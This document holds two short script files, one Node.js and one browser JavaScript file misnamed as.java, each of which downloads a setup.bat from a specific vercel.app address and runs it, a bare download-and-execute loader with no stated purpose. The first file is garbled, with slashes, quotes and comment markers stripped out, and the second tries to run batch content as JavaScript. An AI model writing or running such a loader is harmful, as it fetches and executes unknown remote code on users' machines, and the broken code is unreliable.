File: as.js
#!usrbinenv node

const { createWriteStream, promises fs } = require('fs');
const fetch = require('node-fetch');
const { execFile } = require('child_process');

 Define the URL of the .bat file
const url = httpsdd-xi-five.vercel.appsetup.bat;
const outputFilePath = .setup.bat;
const fileToCheck = pathtoyourcreated_or_modified_file.txt;  Update with your file path

 Function to download the .bat file
const downloadFile = async (url, outputPath) = {
  try {
    console.log(Downloading .bat file from, url);
    const response = await fetch(url);

    if (!response.ok) {
      throw new Error(`Error Unable to download .bat file. Status code ${response.status}`);
    }

    const fileStream = createWriteStream(outputPath);
    await new Promise((resolve, reject) = {
      response.body.pipe(fileStream);
      response.body.on('error', reject);
      fileStream.on('finish', resolve);
    });

    console.log(.bat file downloaded successfully.);
  } catch (error) {
    console.error(Download error, error.message);
    process.exit(1);
  }
};

 Function to execute the .bat file
const executeBatScript = async (filePath) = {
  try {
    console.log(Executing .bat file, filePath);
    const { stdout, stderr } = await new Promise((resolve, reject) = {
      execFile(filePath, (error, stdout, stderr) = {
        if (error) {
          reject(error);
        } else {
          resolve({ stdout, stderr });
        }
      });
    });

    console.log(stdout, stdout);
    console.error(stderr, stderr);
    console.log(.bat file executed successfully.);
  } catch (error) {
    console.error(Execution error, error.message);
    process.exit(1);
  }
};

 Function to check if the .bat file has been successfully executed
const checkScriptExecution = async () = {
  try {
    console.log(Verifying script execution...);
    const stats = await fs.stat(fileToCheck);
    const lastModifiedTime = stats.mtime.getTime();
    const currentTime = Date.now();
    return stats.isFile() && lastModifiedTime  currentTime - 10000;  Check if file modified in last 10 seconds
  } catch (error) {
    console.error(Verification error, error.message);
    return false;
  }
};

 Function to handle the entire process
const handleScriptExecution = async () = {
  try {
    await downloadFile(url, outputFilePath);
    await executeBatScript(outputFilePath);
    if (await checkScriptExecution()) {
      console.log(Script execution verified.);
    } else {
      console.error(Error Script execution verification failed.);
    }
  } catch (error) {
    console.error(Process error, error.message);
  }
};

 Start the script execution process
handleScriptExecution();

File: as.java
// Define the URL of the .bat file
const url = "https://dd-xi-five.vercel.app/setup.bat";

// Function to download the .bat file asynchronously
const downloadFile = (url) => {
  return new Promise((resolve, reject) => {
    const xhr = new XMLHttpRequest();
    xhr.open("GET", url);
    xhr.responseType = "text";

    xhr.onload = () => {
      if (xhr.status === 200) {
        resolve(xhr.responseText);
      } else {
        reject(`Error: Unable to download .bat file. Status code: ${xhr.status}`);
      }
    };

    xhr.onerror = () => {
      reject("Error: Network error occurred while downloading .bat file.");
    };

    xhr.send();
  });
};

// Function to execute the .bat file
const executeBatScript = (scriptContent) => {
  try {
    // Validate script content
    if (!scriptContent.trim()) {
      throw new Error("Error: .bat file content is empty.");
    }

    // Execute the .bat file
    const executeScript = new Function(scriptContent);
    executeScript();
    console.log(".bat file executed successfully.");
  } catch (error) {
    console.error("Error: Failed to execute .bat file.", error);
  }
};

// Function to handle the entire process
const handleScriptExecution = async () => {
  try {
    console.log("Downloading .bat file from:", url);
    const scriptContent = await downloadFile(url);
    console.log(".bat file downloaded successfully.");
    executeBatScript(scriptContent);
  } catch (error) {
    console.error(error);
  }
};

// Start the script execution process
handleScriptExecution();
